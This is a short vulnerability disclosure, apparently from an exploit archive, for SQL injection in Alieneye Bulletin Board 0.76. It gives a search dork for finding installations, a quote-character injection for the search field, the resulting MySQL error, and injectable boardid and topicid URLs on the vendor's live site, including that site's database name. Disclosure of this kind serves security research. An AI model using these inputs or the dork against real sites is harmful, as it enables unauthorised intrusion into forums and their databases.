___ ___ ___ /__/\ / /\ / /\ \ \:\ / /:/_ / /::\ \ \:\ / /:/ /\ / /:/\:\ ___ \ \:\ / /:/ /:/ / /:/ \:\ /__/\ \__\:\ /__/:/ /:/ /__/:/ \__\:\ \ \:\ / /:/ \ \:\/:/ \ \:\ / /:/ \ \:\ /:/ \ \::/ \ \:\ /:/ \ \:\/:/ \ \:\ \ \:\/:/ \ \::/ \ \:\ \ \::/ \__\/ \__\/ \__\/ #Author: Emiliano Febbi (*emilianofebbi.1994@gmail.com*) #Web Site Creator => http://board.alieneye.net/ #Dork: inurl:/board/search.php #CMS => Alieneye Bulletin Board 0.76 (last) #Vulnz => $_POST SQLi/SQLi #Date => 17/03/2023 *PoC* [code] Try To inject this code in the search.php field: '&' The CMS Response => #1 ___________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________ MySQL error in line 763 in /home/aliuemat/www.alieneye.net/board/search.php | | MySQL returned: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '&' %' OR abb1_posts.message LIKE '% '&' %')) GROUP BY abb1_posts.topic_id ORDER ' at line 5 | | MySQL errorno. 1064 | ___________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________| ----------------------------------------------------------------- http://www.alieneye.net/board/board.php?boardid=*6'* <= *SQLi* | #2 ----------------------------------------------------------------- http://www.alieneye.net/board/topic.php?topicid=*442'* <= *SQLi* | #3 ----------------------------------------------------------------- OFF: _______________________________________________________________ Working on the Official CMS site..(http://board.alieneye.net/) | #DB Name => *usrdb_aliuemat2* | _______________________________________________________________| [/code] ._________. */ ///______I ) . /_(_) /__/*PoC End*